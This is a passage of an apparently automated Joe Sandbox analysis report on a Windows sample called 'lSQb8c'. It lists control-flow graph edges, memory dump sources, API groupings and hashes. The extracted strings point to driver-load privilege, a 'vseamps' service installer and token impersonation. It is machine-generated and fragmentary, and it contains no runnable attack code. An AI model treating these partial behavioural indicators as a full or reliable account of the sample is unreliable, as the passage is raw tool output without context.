75->98 76->75 127 7ff8bfaf1cce-7ff8bfaf1cd5 __scrt_dllmain_after_initialize_c 76->127 82 7ff8bfaf1eb3-7ff8bfaf1eb5 77->82 83 7ff8bfaf1e7d-7ff8bfaf1e7f 77->83 86 7ff8bfaf1e4a-7ff8bfaf1e5f call 7ff8bfaf1c00 78->86 87 7ff8bfaf1ef8-7ff8bfaf1f00 78->87 93 7ff8bfaf1eb7-7ff8bfaf1eba 82->93 94 7ff8bfaf1ebc-7ff8bfaf1ed1 call 7ff8bfaf1c00 82->94 83->82 91 7ff8bfaf1e81-7ff8bfaf1ea3 call 7ff8bfaf1720 call 7ff8bfaf1d68 83->91 86->64 86->87 87->70 91->82 122 7ff8bfaf1ea5-7ff8bfaf1eaa 91->122 93->87 93->94 94->87 108 7ff8bfaf1ed3-7ff8bfaf1edd 94->108 115 7ff8bfaf1d35-7ff8bfaf1d40 98->115 116 7ff8bfaf1d11-7ff8bfaf1d1b call 7ff8bfaf2538 98->116 113 7ff8bfaf1ee4-7ff8bfaf1ef2 108->113 114 7ff8bfaf1edf-7ff8bfaf1ee2 108->114 119 7ff8bfaf1ef4 113->119 114->119 115->52 116->115 126 7ff8bfaf1d1d-7ff8bfaf1d2b 116->126 119->87 122->82 126->115 127->75 128 7ff8bfaf1cd7-7ff8bfaf1cf4 call 7ff8bfaf7acc 127->128 128->75
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                    • String ID:
                                                    • API String ID: 190073905-0
                                                    • Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                                    • Instruction ID: 8a65739d6822f52a3ea8b934c2389b036f0d19c4c6421e18e5748f26f88956f3
                                                    • Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                                    • Instruction Fuzzy Hash: 6E819021E0824347FA5CABED94522792BE0AF457C8F54A035DB0DDBBA6DE3CE8458710

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
                                                    • String ID: WordpadFilter.db
                                                    • API String ID: 868324331-3647581008
                                                    • Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                                    • Instruction ID: 19b5af421ebbed7d308ce5d01e4e780aabbc6549bc1196dbbd873862a5114c55
                                                    • Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                                    • Instruction Fuzzy Hash: E2319A32B15B41CAE700CBB5D8502AD77A5EB88788F449635EF8C67B58EE38D191C340

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 196 7ff8bfaf11b0-7ff8bfaf1207 197 7ff8bfaf124b-7ff8bfaf124e 196->197 198 7ff8bfaf1209-7ff8bfaf1222 call 7ff8bfb01490 196->198 199 7ff8bfaf1254-7ff8bfaf1280 197->199 200 7ff8bfaf14b8-7ff8bfaf14bf 197->200 210 7ff8bfaf1224-7ff8bfaf1227 198->210 211 7ff8bfaf123e 198->211 202 7ff8bfaf12f6-7ff8bfaf1335 call 7ff8bfaf1b90 call 7ff8bfb00a50 199->202 203 7ff8bfaf1282-7ff8bfaf128f 199->203 204 7ff8bfaf14c3-7ff8bfaf14ea call 7ff8bfaf1b70 200->204 231 7ff8bfaf1340-7ff8bfaf13cb 202->231 207 7ff8bfaf1295-7ff8bfaf129c 203->207 208 7ff8bfaf14f1-7ff8bfaf14f6 call 7ff8bfaf1a40 203->208 215 7ff8bfaf12c7-7ff8bfaf12cf call 7ff8bfaf1b90 207->215 216 7ff8bfaf129e-7ff8bfaf12a5 207->216 221 7ff8bfaf14f7-7ff8bfaf14ff call 7ff8bfaf1110 208->221 213 7ff8bfaf1241-7ff8bfaf1246 210->213 218 7ff8bfaf1229-7ff8bfaf123c call 7ff8bfb01490 210->218 211->213 213->197 233 7ff8bfaf12d2-7ff8bfaf12f1 call 7ff8bfb00e10 215->233 216->221 222 7ff8bfaf12ab-7ff8bfaf12b3 call 7ff8bfaf1b90 216->222 218->210 218->211 236 7ff8bfaf14eb-7ff8bfaf14f0 call 7ff8bfaf79cc 222->236 237 7ff8bfaf12b9-7ff8bfaf12c5 222->237 231->231 235 7ff8bfaf13d1-7ff8bfaf13da 231->235 233->202 239 7ff8bfaf13e0-7ff8bfaf1402 235->239 236->208 237->233 241 7ff8bfaf1404-7ff8bfaf140e 239->241 242 7ff8bfaf1411-7ff8bfaf142c 239->242 241->242 242->239 244 7ff8bfaf142e-7ff8bfaf1436 242->244 245 7ff8bfaf1498-7ff8bfaf14a6 244->245 246 7ff8bfaf1438-7ff8bfaf143b 244->246 247 7ff8bfaf14b6 245->247 248 7ff8bfaf14a8-7ff8bfaf14b5 call 7ff8bfaf1bcc 245->248 249 7ff8bfaf1440-7ff8bfaf1449 246->249 247->204 248->247 251 7ff8bfaf1455-7ff8bfaf1465 249->251 252 7ff8bfaf144b-7ff8bfaf1453 249->252 253 7ff8bfaf1467-7ff8bfaf146e 251->253 254 7ff8bfaf1470-7ff8bfaf1496 251->254 252->251 253->254 254->245 254->249
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 73155330-0
                                                    • Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                                    • Instruction ID: d8951ec0213194aa9c77d867092eeef2efb567231ee86dacae94ce5319c17769
                                                    • Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                                    • Instruction Fuzzy Hash: 3A818033A1878246E6158B79D4011B9AB94FF56BC8F149335EF5CA7792EF3CE0928300
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
                                                    • String ID:
                                                    • API String ID: 3526400053-0
                                                    • Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                                    • Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
                                                    • Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                                    • Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
                                                    • String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
                                                    • API String ID: 3408796845-4213300970
                                                    • Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                                    • Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
                                                    • Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                                    • Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
                                                    • String ID: ampStopSingletone: logging ended
                                                    • API String ID: 2048888615-3533855269
                                                    • Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                                    • Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
                                                    • Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                                    • Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                                    • Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
                                                    • Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                                    • Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastManagerOpen$FileModuleName
                                                    • String ID: /remove$/service$vseamps
                                                    • API String ID: 67513587-3839141145
                                                    • Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                                    • Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
                                                    • Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                                    • Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
                                                    • GetProcAddress.KERNEL32 ref: 000000014000F0F3
                                                    • GetProcAddress.KERNEL32 ref: 000000014000F117
                                                      • Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$Load$Library
                                                    • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                    • API String ID: 3981747205-232180764
                                                    • Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                                    • Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
                                                    • Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                                    • Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
                                                    • String ID:
                                                    • API String ID: 4284112124-0
                                                    • Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                                    • Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
                                                    • Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                                    • Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
                                                    • String ID: vseamps
                                                    • API String ID: 3693165506-3944098904
                                                    • Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                                    • Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
                                                    • Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                                    • Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00
                                                    APIs
                                                    • GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: FileModuleName
                                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                    • API String ID: 514040917-4022980321
                                                    • Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                                    • Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
                                                    • Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                                    • Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: String$ByteCharMultiWide$AllocErrorHeapLast
                                                    • String ID:
                                                    • API String ID: 2057259594-0
                                                    • Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                                    • Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
                                                    • Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                                    • Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Free$AllocInfoStartupVersion
                                                    • String ID:
                                                    • API String ID: 3103264659-0
                                                    • Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                                    • Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
                                                    • Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                                    • Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 3140674995-0
                                                    • Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                                    • Instruction ID: ae6cc4513c95b1c407b3d4a5dade6310e1f28155b277f13718a24988f2b6b8f8
                                                    • Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                                    • Instruction Fuzzy Hash: 4E317072609B818AEB648FA4E8503EE73A1FB84788F44403ADB4E57B94EF3CD548C714
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                                    • String ID:
                                                    • API String ID: 1269745586-0
                                                    • Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                                    • Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
                                                    • Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                                    • Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 1239891234-0
                                                    • Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                                    • Instruction ID: 2c6298c4103fcc41e77a877e24c84b870873364db6f3d005cd6c2b677ec5d8bb
                                                    • Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                                    • Instruction Fuzzy Hash: D1318132618B8186DB64CF78E8412AE73A0FB88798F501135EB8D47BA5EF3CD149CB00
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
